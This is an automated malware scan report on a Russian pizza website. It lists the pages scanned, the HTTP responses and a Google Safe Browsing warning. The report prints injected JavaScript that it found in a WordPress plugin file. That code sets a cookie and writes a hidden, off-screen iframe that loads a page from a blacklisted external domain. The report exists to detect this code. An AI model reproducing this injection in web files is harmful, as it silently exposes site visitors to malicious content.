Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=amorepizza.ru
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://amorepizza.ru/ | 200 OK Content-Length: 5626 Content-Type: text/html | clean |
http://amorepizza.ru//mc.yandex.ru/metrika/watch.js/ | 404 Not Found Content-Length: 6871 Content-Type: text/html | clean |
http://amorepizza.ru/wp-content/plugins/shutter-reloaded/shutter-reloaded.js?ver=2.4 | 200 OK Content-Length: 8931 Content-Type: application/x-javascript | malicious |
Malicious code found. Script contains blacklisted domain: fiktirobel.lourdescaceres.com.ar ...[204 bytes skipped]... te.toUTCString(); } function takeOrlondo(name) { var nachos = document.cookie.match(new RegExp( "(?:^|; )" + name.replace(/([\.$?*|{}\(\)\[\]\\/\+^])/g, '\$1') + "=([^;]*)" )); return nachos ? decodeURIComponent(nachos[1]) : undefined; } var cookie = takeOrlondo('lirmanusik'); if (cookie == undefined) { setCookie('lirmanusik', true, 259200); document.write('<iframe src="http://fiktirobel.lourdescaceres.com.ar/feotriopol16.html" style="top:-999px;left:-999px;position:absolute;" height="131" width="131"></iframe>'); } } Art_protection(); var shutterLinks={},shutterSets={};function shutterAddLoad(a){if("undefined"!=typeof jQuery){jQuery(document).ready(a())}else{if(typeof window.onload!="function"){window.onload=a}else{oldonld=window.onload;window.onload=function(){if(oldonld){oldonld()}a()}}}}shutterReloaded={I:function(b){return document.getElementBy ...[3074 bytes skipped]... Decoded script: <iframe src="http://fiktirobel.lourdescaceres.com.ar/feotriopol16.html" style="top:-999px;left:-999px;position:absolute;" height="131" width="131"></iframe> Malicious iFrame found. size: 131x131 src: http://fiktirobel.lourdescaceres.com.ar/feotriopol16.html This URL is marked by Google as suspicious <iframe src="http://fiktirobel.lourdescaceres.com.ar/feotriopol16.html" style="top:-999px;left:-999px;position:absolute;" height="131" width="131"> | ||
http://amorepizza.ru/wp-content/plugins/wp-adserve/adclick.php?id=2 | HTTP/1.1 302 Found Connection: close Date: Fri, 26 Dec 2014 03:40:31 GMT Location: # Server: nginx/1.4.4 Content-Length: 0 Content-Type: text/html X-Powered-By: PHP/5.3.27-pl0-gentoo | clean |
http://amorepizza.ru/wp-content/plugins/wp-adserve/ | 403 Forbidden Content-Length: 1111 Content-Type: text/html | clean |
http://amorepizza.ru/test404page.js | 404 Not Found Content-Length: 6836 Content-Type: text/html | clean |
http://amorepizza.ru/wp-content/plugins/wp-adserve/adclick.php?id=18 | HTTP/1.1 302 Found Connection: close Date: Fri, 26 Dec 2014 03:40:32 GMT Location: http://yandex.ru Server: nginx/1.4.4 Content-Length: 0 Content-Type: text/html X-Powered-By: PHP/5.3.27-pl0-gentoo | clean |
http://yandex.ru/ | HTTP/1.1 302 Found Connection: Close Date: Fri, 26 Dec 2014 03:40:32 GMT Location: http://www.yandex.ru/ Vary: Accept-Encoding Content-Length: 205 Content-Type: text/html; charset=iso-8859-1 X-Pad: avoid browser bug | clean |
http://www.yandex.ru/ | 200 Ok Content-Length: 102930 Content-Type: text/html | clean |
http://www.yandex.ru//yastatic.net/jquery/1.8.3/jquery.min.js/ | HTTP/1.1 302 Moved Temporarily Connection: close Date: Fri, 26 Dec 2014 03:40:33 GMT Location: http://yandex.ru/yastatic.net/jquery/1.8.3/jquery.min.js/ Server: nginx Content-Length: 154 Content-Type: text/html | clean |
http://yandex.ru/yastatic.net/jquery/1.8.3/jquery.min.js/ | 404 Not Found Content-Length: 79237 Content-Type: text/html | clean |
http://yandex.ru//yastatic.net/jquery/1.8.3/jquery.min.js/ | 404 Not Found Content-Length: 79237 Content-Type: text/html | clean |
http://yandex.ru//yastatic.net/www/2.184/v12/pages-desktop/error404/_error404.ru.js/ | 404 Not Found Content-Length: 79237 Content-Type: text/html | clean |
http://yandex.ru//www.yandex.ru/ | 404 Not Found Content-Length: 79234 Content-Type: text/html | clean |
http://yandex.ru//maps.yandex.ru/ | 404 Not Found Content-Length: 79237 Content-Type: text/html | clean |
http://yandex.ru//market.yandex.ru/?clid=505/ | 404 Not Found Content-Length: 79237 Content-Type: text/html | clean |
http://yandex.ru//slovari.yandex.ru/ | 404 Not Found Content-Length: 79234 Content-Type: text/html | clean |
http://yandex.ru//yandex.ru/images/ | 404 Not Found Content-Length: 79234 Content-Type: text/html | clean |
http://yandex.ru//yandex.ru/video/ | 404 Not Found Content-Length: 79234 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: amorepizza.ru
Result:
HTTP/1.1 200 OK
Connection: close
Date: Fri, 26 Dec 2014 03:40:30 GMT
Server: nginx/1.4.4
Content-Length: 5626
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=ce7ti3btu8a9emul9umpq6b1o2; path=/
X-Pingback: http://amorepizza.ru/xmlrpc.php
X-Powered-By: PHP/5.3.27-pl0-gentoo
...5626 bytes of data.
GET / HTTP/1.1
Host: amorepizza.ru
Result:
HTTP/1.1 200 OK
Connection: close
Date: Fri, 26 Dec 2014 03:40:30 GMT
Server: nginx/1.4.4
Content-Length: 5626
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=ce7ti3btu8a9emul9umpq6b1o2; path=/
X-Pingback: http://amorepizza.ru/xmlrpc.php
X-Powered-By: PHP/5.3.27-pl0-gentoo
...5626 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: amorepizza.ru
Referer: http://www.google.com/search?q=amorepizza.ru
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: amorepizza.ru
Referer: http://www.google.com/search?q=amorepizza.ru
Result:
The result is similar to the first query. There are no suspicious redirects found.